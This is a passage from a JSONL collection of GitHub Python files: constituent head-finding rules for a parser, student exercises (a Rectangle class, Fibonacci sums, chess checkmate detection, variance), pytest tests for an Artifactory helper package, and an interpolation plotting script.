{'express': '222'}\n assert SegmentStationSchema(context={'express_by_station_id_cache': {20: '222'}}).dump(station)[0] == result\n\n\ndef test_codes():\n station = create_station()\n assert_that(SegmentStationSchema(context={'express_by_station_id_cache': {station.id: '222'}}).dump(station)[0],\n has_entry('codes', {'express': '222'}))\n\n\n@pytest.mark.parametrize('station_zone, settlement_zone, result', {\n ('Asia/Omsk', 'Europe/Oslo', 'Europe/Oslo'),\n ('Asia/Omsk', 'Asia/Omsk', 'Asia/Omsk'),\n})\ndef test_timezone_dump(station_zone, settlement_zone, result):\n station = create_station(settlement=create_settlement(time_zone=settlement_zone), time_zone=station_zone)\n assert_that(SegmentStationSchema().dump(station)[0], has_entry('timezone', result))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/serialization/test_segment_station (2).py","file_name":"test_segment_station (2).py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4478513062","text":"\"\"\"Functions related to finding the linguistic head of a constituent.\"\"\"\nimport io\nimport re\nfrom collections import defaultdict, Counter\nfrom .tree import Tree, HEAD, COMPLEMENT, MODIFIER\nfrom .punctuation import ispunct\n\nFIELDS = tuple(range(8))\nWORD, LEMMA, TAG, MORPH, FUNC, PARENT, SECEDGETAG, SECEDGEPARENT = FIELDS\nHEADRULERE = re.compile(r'^(\\S+)\\s+(LEFT-TO-RIGHT|RIGHT-TO-LEFT'\n\t\tr'|LEFT|RIGHT|LEFTDIS|RIGHTDIS|LIKE)(?:\\s+(.*))?$')\n\n\ndef applyheadrules(tree, headrules, modifierrules=None):\n\t\"\"\"Apply head rules and set head attribute of nodes.\"\"\"\n\tfor node in tree.subtrees(\n\t\t\tlambda n: n and isinstance(n[0], Tree)):\n\t\thead = headfinder(node, headrules)\n\t\tif head is not None:\n\t\t\thead.type = HEAD\n\t\t\tif modifierrules is not None:\n\t\t\t\tmarkmodifiers(node, modifierrules)\n\n\ndef getheadpos(node):\n\t\"\"\"Get head word dominated by this node.\"\"\"\n\tchild = node\n\twhile True:\n\t\tif not child:\n\t\t\tbreak\n\t\tif not isinstance(child[0], Tree):\n\t\t\treturn child\n\t\ttry:\n\t\t\tchild = next(a for a in child if a.type == HEAD)\n\t\texcept StopIteration:\n\t\t\tbreak\n\treturn None\n\n\ndef readheadrules(filename):\n\t\"\"\"Read a file containing heuristic rules for head assignment.\n\n\tExample line: ``s right-to-left vmfin vafin vaimp``, which means\n\ttraverse siblings of an S constituent from right to left, the first child\n\twith a label of vmfin, vafin, or vaimp will be marked as head.\"\"\"\n\theadrules = {}\n\twith io.open(filename, encoding='utf8') as inp:\n\t\tfor line in inp:\n\t\t\tline = line.strip().upper()\n\t\t\tif line and not line.startswith(\"%\") and len(line.split()) > 2:\n\t\t\t\ttry:\n\t\t\t\t\tlabel, direction, heads = HEADRULERE.match(line).groups()\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tprint('no match:', line)\n\t\t\t\t\traise\n\t\t\t\tif heads is None:\n\t\t\t\t\theads = ''\n\t\t\t\theadrules.setdefault(label, [])\n\t\t\t\tif direction == 'LIKE':\n\t\t\t\t\theadrules[label].extend(headrules[heads])\n\t\t\t\telse:\n\t\t\t\t\theadrules[label].append((direction, heads.split()))\n\treturn headrules\n\n\ndef headfinder(tree, headrules, headlabels=frozenset({'HD'})):\n\t\"\"\"Use head finding rules to select one child of tree node as head.\"\"\"\n\tdef find(heads, children):\n\t\t\"\"\"Match children with possible heads.\"\"\"\n\t\tfor head in heads:\n\t\t\tfor child in children:\n\t\t\t\tif (isinstance(child, 
Tree)\n\t\t\t\t\t\tand child.label.split('[')[0].upper() == head):\n\t\t\t\t\treturn child\n\n\tdef invfind(heads, children):\n\t\t\"\"\"Inverted version of find().\"\"\"\n\t\tfor child in children:\n\t\t\tfor head in heads:\n\t\t\t\tif (isinstance(child, Tree)\n\t\t\t\t\t\tand child.label.split('[')[0].upper() == head):\n\t\t\t\t\treturn child\n\n\t# check if we already have head information:\n\tfor child in tree:\n\t\tif child.type == HEAD:\n\t\t\treturn child\n\tfor child in tree:\n\t\tif (child.source and not headlabels.isdisjoint(\n\t\t\t\tchild.source[FUNC].upper().split('-'))):\n\t\t\treturn child\n\t# apply heuristic rules:\n\thead = None\n\tchildren = tree\n\tfor direction, heads in headrules.get(tree.label, []):\n\t\tif direction.startswith('LEFT'):\n\t\t\tchildren = tree\n\t\telif direction.startswith('RIGHT'):\n\t\t\tchildren = tree[::-1]\n\t\telse:\n\t\t\traise ValueError('expected RIGHT or LEFT.')\n\t\tif direction in ('LEFTDIS', 'RIGHTDIS'):\n\t\t\thead = invfind(heads, children)\n\t\telse:\n\t\t\thead = find(heads, children)\n\t\tif head is not None:\n\t\t\tbreak\n\tif head is None:\n\t\t# default head is initial/last nonterminal (depending on direction)\n\t\tfor child in children:\n\t\t\tif (isinstance(child, Tree)\n\t\t\t\t\tand not ispunct(None, child)):\n\t\t\t\treturn child\n\t\treturn children[0]\n\telse: # PTB-specific\n\t\ti = tree.index(head)\n\t\tif i >= 2 and tree[i - 1].label in {'CC', 'CONJP'}:\n\t\t\tfor althead in tree[i - 2::-1]:\n\t\t\t\tif not ispunct(althead.label, althead):\n\t\t\t\t\treturn althead\n\t\treturn head\n\n\ndef readmodifierrules(filename):\n\t\"\"\"Read a file containing heuristic rules for marking modifiers.\n\n\tExample line: ``S *-MOD``, which means that for an S\n\tconstituent, any child with the MOD function tag is a modifier.\n\tA default rule can be specified by using * as the first label, which\n\talways matches (in addition to another matching rule, if any).\n\tIf none of the rules matches, a non-terminal is assumed to be a complement.\n\t\"\"\"\n\tmodifierrules = {}\n\twith io.open(filename, encoding='utf8') as inp:\n\t\tfor line in inp:\n\t\t\tline = line.strip().upper()\n\t\t\tif line and not line.startswith(\"%\"):\n\t\t\t\tlabel, modifiers = line.split(None, 1)\n\t\t\t\tif label in modifierrules:\n\t\t\t\t\traise ValueError('duplicate rule for %r (each label'\n\t\t\t\t\t\t\t' should occur at most once in the file)' % label)\n\t\t\t\tmodifierrules[label] = modifiers.split()\n\treturn modifierrules\n\n\ndef markmodifiers(tree, modifierrules):\n\t\"\"\"Use heuristics to distinguish complements from modifiers.\n\n\tShould be applied after heads have been identified.\"\"\"\n\tfrom discodop.treebanktransforms import function\n\tprev = None\n\tfor child in tree:\n\t\tif child.type == HEAD:\n\t\t\tcontinue\n\t\tchild.type = COMPLEMENT\n\t\tapplicablerules = modifierrules.get(tree.label.split('-', 1)[0], []\n\t\t\t\t) + modifierrules.get('*', [])\n\t\tfor mod in applicablerules:\n\t\t\tif ((child.label.split('-', 1)[0].upper() == mod.split('-', 1)[0]\n\t\t\t\t\tor mod.split('-', 1)[0] == '*')\n\t\t\t\t\tand ('-' not in mod\n\t\t\t\t\t\tor mod.split('-', 1)[1] == '*'\n\t\t\t\t\t\tor function(child).upper() == mod.split('-', 1)[1])):\n\t\t\t\tchild.type = MODIFIER\n\t\t\t\tbreak\n\t\tif child.label == prev: # mark enumerations/lists as modifiers\n\t\t\tchild.type = MODIFIER\n\t\tprev = child.label\n\n\ndef saveheads(tree, tailmarker):\n\t\"\"\"Infer head from binarization and store.\"\"\"\n\tif tailmarker:\n\t\tfor node in 
tree.subtrees(lambda n: tailmarker in n.label):\n\t\t\tnode.type = HEAD\n\telse:\n\t\t# assume head-outward binarization; the last binarized node has the head.\n\t\tfor node in tree.subtrees(lambda n: '|<' in n.label\n\t\t\t\tand not any(child.label.startswith(\n\t\t\t\t\tn.label[:n.label.index('|<') + 2])\n\t\t\t\t\tfor child in n)):\n\t\t\tnode[-1].type = HEAD\n\n\ndef headstats(trees):\n\t\"\"\"Collect some information useful for writing headrules.\n\n\t- ``heads['NP']['NN'] ==`` number of times NN occurs as head of NP.\n\t- ``pos1['NP'][1] ==`` number of times head of NP is at position 1.\n\t- ``pos2`` is like pos1, but position is from the right.\n\t- ``unknown['NP']['NN'] ==`` number of times NP that does not have a head\n\t\tdominates an NN.\"\"\"\n\theads, unknown = defaultdict(Counter), defaultdict(Counter)\n\tpos1, pos2 = defaultdict(Counter), defaultdict(Counter)\n\tfor tree in trees:\n\t\tfor a in tree.subtrees(lambda x: len(x) > 1):\n\t\t\tfor n, b in enumerate(a):\n\t\t\t\tif b.type == HEAD:\n\t\t\t\t\theads[a.label][b.label] += 1\n\t\t\t\t\tpos1[a.label][n] += 1\n\t\t\t\t\tpos2[a.label][len(a) - (n + 2)] += 1\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tunknown[a.label].update(b.label for b in a)\n\treturn heads, unknown, pos1, pos2\n\n\n__all__ = ['getheadpos', 'readheadrules', 'headfinder', 'saveheads',\n\t\t'headstats', 'applyheadrules']\n","repo_name":"andreasvc/disco-dop","sub_path":"discodop/heads.py","file_name":"heads.py","file_ext":"py","file_size_in_byte":6644,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"72"} +{"seq_id":"10483472599","text":"#!/usr/bin/python3\n\"\"\" 0x0C. Python - Almost a circle \"\"\"\n\n\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\" First Rectangle \"\"\"\n def __init__(self, width, height, x=0, y=0, id=None):\n super().__init__(id)\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n\n @property\n def width(self):\n return self.__width\n\n @width.setter\n def width(self, value):\n if type(value) is not int:\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = value\n\n @property\n def height(self):\n return self.__height\n\n @height.setter\n def height(self, value):\n if type(value) is not int:\n raise TypeError(\"height must be an integer\")\n if value <= 0:\n raise ValueError(\"height must be > 0\")\n self.__height = value\n\n @property\n def x(self):\n return self.__x\n\n @x.setter\n def x(self, value):\n if type(value) is not int:\n raise TypeError(\"x must be an integer\")\n if value < 0:\n raise ValueError(\"x must be >= 0\")\n self.__x = value\n\n @property\n def y(self):\n return self.__y\n\n @y.setter\n def y(self, value):\n if type(value) is not int:\n raise TypeError(\"y must be an integer\")\n if value < 0:\n raise ValueError(\"y must be >= 0\")\n self.__y = value\n\n def area(self):\n \"\"\" Area first \"\"\"\n return self.width * self.__height\n\n def display(self):\n \"\"\" Display #0 \"\"\"\n if self.__y != 0:\n for lines in range(self.__y):\n print()\n for lines in range(self.__height):\n print((self.__x * \" \") + ('#' * self.__width))\n\n def __str__(self):\n \"\"\" __str__ \"\"\"\n return \"[{}] ({}) {}/{} - {}/{}\".format(self.__class__.__name__,\n self.id, self.__x, self.__y,\n self.__width, self.__height)\n\n def update(self, *args, **kwargs):\n \"\"\" Update #0 \"\"\"\n if len(kwargs) != 0:\n for keys, values in kwargs.items():\n setattr(self, keys, values)\n elif 
len(args) != 0:\n            try:\n                self.id = args[0]\n                self.__width = args[1]\n                self.__height = args[2]\n                self.__x = args[3]\n                self.__y = args[4]\n            except IndexError:\n                pass\n        else:\n            print()\n\n    def to_dictionary(self):\n        \"\"\" Rectangle instance to dictionary representation \"\"\"\n        return {'id': self.id, 'width': self.__width, 'height': self.__height,\n                'x': self.__x, 'y': self.__y}\n","repo_name":"MegaChie/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20811391258","text":"# Uses python3\r\ndef fibonacci_partial_sum_efficient(m, n):\r\n    if n <= 1:\r\n        return n\r\n\r\n\r\n    previous = 0\r\n    current = 1\r\n    period = 0 # After one period, step two numbers ahead to check if the sequence starts again from 0 and 1\r\n    fib_mod = [0, 1]\r\n    i = 2\r\n\r\n    while(True):\r\n        previous, current = current, previous + current\r\n        period = period + 1\r\n        fib_mod.append(current % 10)\r\n        if fib_mod[i-1] == 0 and fib_mod[i] == 1:\r\n            break\r\n        i = i + 1\r\n\r\n    sum_fib_m = fib_mod[(m + 1) % period] - 1 # Finding the sum of m-1 fibonacci numbers.\r\n    sum_fib_n = fib_mod[(n + 2) % period] - 1\r\n    diff = sum_fib_n - sum_fib_m\r\n    if diff < 0:\r\n        return diff + 10\r\n    else:\r\n        return diff\r\n\r\nif __name__ == '__main__':\r\n    inputs = input();\r\n    m, n = map(int, inputs.split())\r\n    print(fibonacci_partial_sum_efficient(m, n))","repo_name":"asquare24/Algorithm_toolbox","sub_path":"Week_2/fibonacci_partial_sum_final.py","file_name":"fibonacci_partial_sum_final.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39578983435","text":"import sys\n\ndef canPawnMoveToEight(chess, i, j):\n    if chess[i][j] == \"#\":\n        return True\n    return False\ndef findPawnAndPositionAtEight(chess):\n    eight = chess[0]\n    seven = chess[1]\n\n    for j, ch in enumerate(seven):\n        if ch == 'P' and canPawnMoveToEight(chess, 0, j):\n            return 1,j,0,j\n    return None, None, None, None\n\ndef findKing(chess):\n    for i in range(len(chess)):\n        for j in range(len(chess[0])):\n            if chess[i][j] == 'k':\n                return i,j\n    return None, None\n\ndef findDiagonalPosition(kingI, kingJ, i, j):\n    if i > kingI:\n        if j 
> kingJ:\n            return -1, -1\n        else:\n            return -1, 1\n    else:\n        if j > kingJ:\n            return 1, -1\n        else:\n            return 1, 1 \n\ndef queenCanCheckmate(chess, kingI, kingJ, i, j):\n    if abs(kingI - i) != abs(kingJ - j) and abs(kingI - i) != 0 and abs(kingJ - j) != 0:\n        return False\n\n    if abs(kingI - i) == 0:\n        start = min(kingJ, j)\n        stop = max(kingJ, j)\n        for k in range(start + 1, stop):\n            if chess[i][k] != '#':\n                return False\n        return True\n    if abs(kingJ - j) == 0:\n        start = min(kingI, i)\n        stop = max(kingI, i)\n        for k in range(start + 1, stop):\n            if chess[k][j] != '#':\n                return False\n        return True\n\n\n    m,n = findDiagonalPosition(kingI, kingJ, i, j)\n    start = i+m\n    stop = j+n\n    while start != kingI and stop != kingJ:\n        if chess[start][stop] != '#':\n            return False\n        start += m\n        stop += n\n    return True\n\n\ndef knightCanCheckmate(chess, kingI, kingJ, i, j):\n    if abs(kingI - i) == 2 and abs(kingJ - j) == 1:\n        return True\n    if abs(kingJ - j) == 2 and abs(kingI - i) == 1:\n        return True\n    return False \n\n\ndef rookCanCheckmate(chess, kingI, kingJ, i, j):\n    if abs(kingI - i) != 0 and abs(kingJ - j) != 0:\n        return False\n\n    if abs(kingI - i) == 0:\n        start = min(kingJ, j)\n        stop = max(kingJ, j)\n        for k in range(start + 1, stop):\n            if chess[i][k] != '#':\n                return False\n        return True\n    \n    start = min(kingI, i)\n    stop = max(kingI, i)\n    for k in range(start + 1, stop):\n        if chess[k][j] != '#':\n            return False\n    return True\n\ndef bishopCanCheckmate(chess, kingI, kingJ, i, j):\n    if abs(kingI - i) != abs(kingJ - j):\n        return False\n\n    m,n = findDiagonalPosition(kingI, kingJ, i, j)\n    start = i+m\n    stop = j+n\n    while start != kingI and stop != kingJ:\n        if chess[start][stop] != '#':\n            return False\n        start += m\n        stop += n\n    return True\n\ndef isCheckmate(chess, kingI, kingJ):\n    n = len(chess)\n    m = len(chess[0])\n    for i in range(n):\n        for j in range(m):\n            if chess[i][j] == 'Q':\n                if queenCanCheckmate(chess, kingI, kingJ, i, j):\n                    return True\n            if chess[i][j] == 'N':\n                if knightCanCheckmate(chess, kingI, kingJ, i, j):\n                    return True\n            if chess[i][j] == 'R':\n                if rookCanCheckmate(chess, kingI, kingJ, i, j):\n                    return True\n            if chess[i][j] == 'B':\n                if bishopCanCheckmate(chess, kingI, kingJ, i, j):\n                    return True\n    return False\ndef solve(chess):\n    oldI, oldJ, i, j = findPawnAndPositionAtEight(chess)\n    if i == None:\n        return -1\n    kingI, kingJ = findKing(chess)\n    if kingI == None:\n        return -1\n\n    c = 0\n    chess[oldI][oldJ] = '#'\n    for m in ['Q', 'N', 'R', 'B']:\n        chess[i][j] = m\n        if isCheckmate(chess, kingI, kingJ):\n            c += 1\n    return c\n\n\nt = int(sys.stdin.readline())\nfor _ in range(t):\n    chess = []\n    for _ in range(8):\n        line = list(sys.stdin.readline().strip())\n        chess.append(line)\n\n    print(solve(chess))","repo_name":"lebahoang/cp","sub_path":"hrk/week36/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39970297552","text":"'''\r\n    Q) Define a class that computes the following dispersion measures by creating dynamic member variables.\r\n    \r\nclass Scattering : \r\n    \r\n    constructor \r\n    \r\n    variance function (var_func)\r\n        var = sum((x - mean)**2) / (n-1)\r\n    standard deviation function (std_func) \r\n        std = sqrt(var)\r\n        \r\n    << Expected output >>\r\n    variance : 7.466666666666666\r\n    standard deviation : 2.7325202042558927\r\n'''\r\n\r\nfrom statistics import mean\r\nfrom math import sqrt\r\n\r\n\r\nclass Scattering :\r\n    def __init__(self, x):\r\n        self.x = x\r\n\r\n    def var_func(self):\r\n        X = [(i - mean(self.x))**2 for i in self.x]\r\n        self.var = (sum(X) / (len(self.x)-1))\r\n    def std_func(self):\r\n        self.std = sqrt(self.var)\r\n    def final(self):\r\n        print('variance : %f \\n' 'standard deviation : %f'%(self.var, self.std))\r\n\r\nx = [5, 9, 1, 7, 4, 6]\r\nscattering = Scattering(x)\r\nprint(scattering.x) # [5, 9, 1, 7, 4, 6]\r\nscattering.var_func()\r\nprint(scattering.var)\r\nscattering.std_func()\r\nprint(scattering.std)\r\n\r\nscattering.final()\r\n","repo_name":"yangmyongho/3_Python","sub_path":"chap06_Class_exams/exam02.py","file_name":"exam02.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2327107458","text":"\"\"\"\nTests requiring internet connection are treated as if they are big data tests.\nWe could use pytest-remotedata plugin but requiring another plugin to test\na plugin package is a little too meta.\n\"\"\"\nimport json\nimport os\n\nimport pytest\n\nfrom ci_watson.artifactory_helpers import (\n    HAS_ASTROPY, BigdataError, get_bigdata_root, get_bigdata,\n    check_url, compare_outputs, generate_upload_params, generate_upload_schema)\n\n\n@pytest.mark.bigdata\n@pytest.mark.parametrize(\n    ('val', 'ans'),\n    [('/local/path', False),\n     ('https://google.com', True),\n     
('https://github.com/spacetelescopehstcalblahblah', False)])\ndef test_check_url(val, ans):\n assert check_url(val) is ans\n\n\nclass TestBigdataRoot:\n def setup_class(self):\n self.key = 'FOOFOO'\n\n def teardown_class(self):\n if self.key in os.environ:\n del os.environ[self.key]\n\n def test_no_env(self):\n if self.key in os.environ:\n del os.environ[self.key]\n with pytest.raises(BigdataError):\n get_bigdata_root(envkey=self.key)\n\n @pytest.mark.bigdata\n def test_has_env_url(self):\n path = 'https://google.com'\n os.environ[self.key] = path\n assert get_bigdata_root(envkey=self.key) == path\n\n def test_has_env_local(self):\n path = os.path.abspath(os.curdir)\n os.environ[self.key] = path\n assert get_bigdata_root(envkey=self.key) == path\n\n def test_no_path(self):\n os.environ[self.key] = '/some/fake/path'\n assert get_bigdata_root(envkey=self.key) is None\n\n\n@pytest.mark.bigdata\nclass TestGetBigdata:\n def setup_class(self):\n self.root = get_bigdata_root()\n\n def test_nocopy(self, _jail, pytestconfig):\n args = (pytestconfig.getini('inputs_root')[0],\n 'dev',\n 'input',\n 'j6lq01010_asn.fits')\n dest = get_bigdata(*args, docopy=False)\n assert dest == os.path.abspath(os.path.join(self.root, *args))\n assert len(os.listdir()) == 0\n\n @pytest.mark.parametrize('docopy', [True, False])\n def test_no_data(self, docopy):\n with pytest.raises(BigdataError):\n get_bigdata('fake', 'path', 'somefile.txt', docopy=docopy)\n\n def test_get_data(self, _jail, pytestconfig):\n \"\"\"\n This tests download when TEST_BIGDATA is pointing to Artifactory.\n And tests copy when it is pointing to local path.\n \"\"\"\n args = (pytestconfig.getini('inputs_root')[0],\n 'dev',\n 'input',\n 'j6lq01010_asn.fits')\n dest = get_bigdata(*args)\n assert dest == os.path.abspath(os.path.join(os.curdir, args[-1]))\n\n\n@pytest.mark.bigdata\n@pytest.mark.usefixtures('_jail')\n@pytest.mark.skipif(not HAS_ASTROPY, reason='requires astropy to run')\nclass TestCompareOutputs:\n \"\"\"\n Test a few common comparison scenarios.\n\n FITSDiff and HDUDiff are tested in Astropy, so here we simply\n test if they report differences or not, but we do not check\n the content too closely.\n\n .. 
note:: Upload schema functions are tested separately elsewhere.\n\n \"\"\"\n def setup_class(self):\n self.inpath = ('ci-watson', 'dev', 'input')\n\n if os.environ.get('TEST_BIGDATA').startswith('http'):\n self.copy = True\n else:\n self.copy = False\n\n def test_raise_error_fits(self):\n \"\"\"Test mismatched extensions from the same file.\"\"\"\n get_bigdata(*self.inpath, 'j6lq01010_asn.fits', docopy=True)\n outputs = [('j6lq01010_asn.fits[PRIMARY]', 'j6lq01010_asn.fits[asn]')]\n with pytest.raises(AssertionError) as exc:\n compare_outputs(outputs, input_path=self.inpath,\n docopy=self.copy, verbose=False)\n assert 'Headers contain differences' in str(exc)\n\n def test_difference_ascii(self):\n \"\"\"\n Test ASCII with differences but suppress error to inspect\n returned report.\n \"\"\"\n get_bigdata(*self.inpath, 'j6lq01010_asn_mod.txt', docopy=True)\n report = compare_outputs(\n [('j6lq01010_asn_mod.txt', 'j6lq01010_asn.txt')],\n input_path=self.inpath, docopy=self.copy, verbose=False,\n raise_error=False)\n s = report.split(os.linesep)\n assert s[2:] == ['@@ -1,4 +1,4 @@',\n ' # MEMNAME MEMTYPE MEMPRSNT',\n '-J6LQ01NAQ EXP-CRJ 2',\n '+J6LQ01NAQ EXP-CRJ 1',\n ' J6LQ01NDQ EXP-CRJ 1',\n '-J6LQ01013 PROD-RPT 1',\n '+J6LQ01011 PROD-CRJ 1',\n '']\n\n @pytest.mark.parametrize(\n 'filename', ['j6lq01010_asn.fits', 'j6lq01010_asn.txt'])\n def test_all_okay(self, filename):\n \"\"\"Same file has no difference.\"\"\"\n get_bigdata(*self.inpath, filename, docopy=True)\n report = compare_outputs(\n [(filename, filename)], input_path=self.inpath,\n docopy=self.copy, verbose=False)\n assert 'No differences found' in report\n\n @pytest.mark.parametrize('docopy', [False, True])\n def test_truth_missing(self, docopy):\n get_bigdata(*self.inpath, 'j6lq01010_asn.fits', docopy=True)\n with pytest.raises(AssertionError) as exc:\n compare_outputs(\n [('j6lq01010_asn.fits', 'doesnotexist.fits')],\n input_path=self.inpath, docopy=docopy, verbose=False)\n assert 'Cannot find doesnotexist.fits' in str(exc)\n\n @pytest.mark.parametrize(\n 'outputs',\n [[('j6lq01010_asn.fits[ASN]', 'j6lq01010_asn_mod.fits', ['image'])],\n [('j6lq01010_asn.fits', 'j6lq01010_asn_mod.fits[ASN]', ['image'])]])\n def test_ambiguous_extlist(self, outputs):\n \"\"\"Too many ways to do the same thing.\"\"\"\n get_bigdata(*self.inpath, 'j6lq01010_asn.fits', docopy=True)\n with pytest.raises(AssertionError) as exc:\n compare_outputs(outputs, input_path=self.inpath, docopy=self.copy,\n verbose=False)\n assert 'Ambiguous extension requirements' in str(exc)\n\n def test_mixed_bunch(self):\n \"\"\"\n Test different forms of acceptable ``outputs``.\n\n .. note:: Some other crazy combos are theoretically possible given\n the logic but they are not officially supported, hence\n not tested here. 
Add new combo as its support is added.\n\n \"\"\"\n for filename in ('j6lq01010_asn.fits', 'j6lq01010_asn.txt'):\n get_bigdata(*self.inpath, filename, docopy=True)\n\n outputs = [('j6lq01010_asn.fits', 'j6lq01010_asn.fits'),\n ('j6lq01010_asn.fits[asn]', 'j6lq01010_asn.fits[ASN]'),\n {'files': ('j6lq01010_asn.fits[image]',\n 'j6lq01010_asn_mod.fits[IMAGE]'),\n 'pars': {'rtol': 1e-7, 'atol': 0.05}},\n {'files': ('j6lq01010_asn.fits',\n 'j6lq01010_asn_mod.fits',\n ['image']),\n 'pars': {'rtol': 1e-7, 'atol': 0.05}},\n {'files': ('j6lq01010_asn.txt', 'j6lq01010_asn.txt')},\n ('j6lq01010_asn.fits', 'j6lq01010_asn_mod.fits',\n ['primary', 'IMAGE']),\n ('j6lq01010_asn.txt', 'j6lq01010_asn.txt')]\n report = compare_outputs(\n outputs, input_path=self.inpath, docopy=self.copy,\n verbose=False, raise_error=False)\n\n # There are 7 comparisons, and only 1 should show a difference\n assert report.count(\"No differences found\") == 6\n assert report.count(\"different pixels found\") == 1\n\n\nclass TestGenerateUploadParams:\n def setup_class(self):\n self.old_envs = {}\n for key in ('BUILD_TAG', 'BUILD_MATRIX_SUFFIX'):\n self.old_envs[key] = os.environ.get(key)\n\n # Set up something reproducible\n os.environ['BUILD_TAG'] = 'tag0'\n os.environ['BUILD_MATRIX_SUFFIX'] = 'foo'\n\n def teardown_class(self):\n for key, val in self.old_envs.items():\n if val is None:\n del os.environ[key]\n else:\n os.environ[key] = val\n\n def test_gen(self, _jail):\n # Dummy file to move.\n datafile = 'actual.txt'\n with open(datafile, 'w') as f:\n f.write('\\n')\n\n updated_outputs = [(datafile, '/path/to/desired.txt')]\n schema_pattern, tree, testname = generate_upload_params(\n 'groot', updated_outputs, verbose=False)\n\n assert schema_pattern == ['*.log', os.path.abspath('desired.txt')]\n assert isinstance(testname, str) # Actual value non-deterministic\n\n # TODO: Use regex?\n split_tree = tree.split(os.sep)\n assert split_tree[0] == 'groot'\n assert split_tree[1].endswith('_tag0_foo')\n assert split_tree[3] == ''\n\n # Make sure file is moved properly.\n dirlist = os.listdir()\n assert dirlist == ['desired.txt']\n\n\ndef test_generate_upload_schema_multi(_jail):\n generate_upload_schema(\n ['*.log', 'desired.txt'], 'reponame/repopath', 'foo')\n # TODO: Better way to compare JSON?\n with open('foo_results.json') as f:\n j = json.load(f)\n assert json.dumps(j, indent=4, sort_keys=True).split(os.linesep) == [\n '{',\n ' \"files\": [',\n ' {',\n ' \"excludePatterns\": [],',\n ' \"explode\": \"false\",',\n ' \"flat\": \"true\",',\n ' \"pattern\": \"*.log\",',\n ' \"props\": null,',\n ' \"recursive\": \"false\",',\n ' \"regexp\": \"false\",',\n ' \"target\": \"reponame/repopath\"',\n ' },',\n ' {',\n ' \"excludePatterns\": [],',\n ' \"explode\": \"false\",',\n ' \"flat\": \"true\",',\n ' \"pattern\": \"desired.txt\",',\n ' \"props\": null,',\n ' \"recursive\": \"false\",',\n ' \"regexp\": \"false\",',\n ' \"target\": \"reponame/repopath\"',\n ' }',\n ' ]',\n '}']\n\n\ndef test_generate_upload_schema_one(_jail):\n generate_upload_schema(\n 'desired.txt', 'reponame/repopath', 'foo', recursive=True)\n # TODO: Better way to compare JSON?\n with open('foo_results.json') as f:\n j = json.load(f)\n assert json.dumps(j, indent=4, sort_keys=True).split(os.linesep) == [\n '{',\n ' \"files\": [',\n ' {',\n ' \"excludePatterns\": [],',\n ' \"explode\": \"false\",',\n ' \"flat\": \"true\",',\n ' \"pattern\": \"desired.txt\",',\n ' \"props\": null,',\n ' \"recursive\": \"true\",',\n ' \"regexp\": \"false\",',\n ' \"target\": 
\"reponame/repopath\"',\n ' }',\n ' ]',\n '}']\n","repo_name":"spacetelescope/ci_watson","sub_path":"tests/test_artifactory_helpers.py","file_name":"test_artifactory_helpers.py","file_ext":"py","file_size_in_byte":10989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34901877654","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 22 13:49:13 2018\n\n@author: Kel3vra\n\"\"\"\n\nimport pickle\n\n\nfile = open(\"Tf-IDF.pickle\",'rb')\nobject_file = pickle.load(file)\n\nprint(object_file)\n\n","repo_name":"Athaagra/Txt_Classification_Sparse_Data","sub_path":"read_pickle.py","file_name":"read_pickle.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72767793192","text":"import numexpr as ne\r\nimport random\r\nimport matplotlib.pyplot as plt\r\n\r\ndef randomColor():\r\n return \"#\" + ''.join([random.choice('0123456789ABCDEF') for j in range(6)])\r\n\r\ndef genPointsForLine(xStart, xEnd, pol):\r\n X, Y = [], []\r\n x = xStart\r\n while x <= xEnd:\r\n Y.append(pol.findValue(x=x))\r\n X.append(x)\r\n x += (xEnd - xStart) / 50\r\n\r\n return X, Y\r\n\r\n\r\ndef showPol(table, newton, spline_0_0, spline_P_0, spline_P_P):\r\n xStart = table.x[0]\r\n xEnd = table.x[-1]\r\n\r\n NX, NY = genPointsForLine(xStart, xEnd, newton)\r\n S00X, S00Y = genPointsForLine(xStart, xEnd, spline_0_0)\r\n SP0X, SP0Y = genPointsForLine(xStart, xEnd, spline_P_0)\r\n SPPX, SPPY = genPointsForLine(xStart, xEnd, spline_P_P)\r\n\r\n plt.plot(table.x, table.y, 'mo', label='Start points')\r\n plt.plot(NX, NY, randomColor(), label='Newton')\r\n plt.plot(S00X, S00Y, randomColor(), label='Spline 0 0')\r\n plt.plot(SP0X, SP0Y, randomColor(), label='Spline P 0')\r\n plt.plot(SPPX, SPPY, randomColor(), label='Spline P P')\r\n\r\n plt.legend()\r\n ax = plt.gca()\r\n ax.spines['left'].set_position('center')\r\n ax.spines['bottom'].set_position('center')\r\n ax.spines['top'].set_visible(False)\r\n ax.spines['right'].set_visible(False)\r\n\r\n plt.show()\r\n\r\n","repo_name":"Tulenenok/BMSTU","sub_path":"Сomputational algorithms/lab_03/view/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} 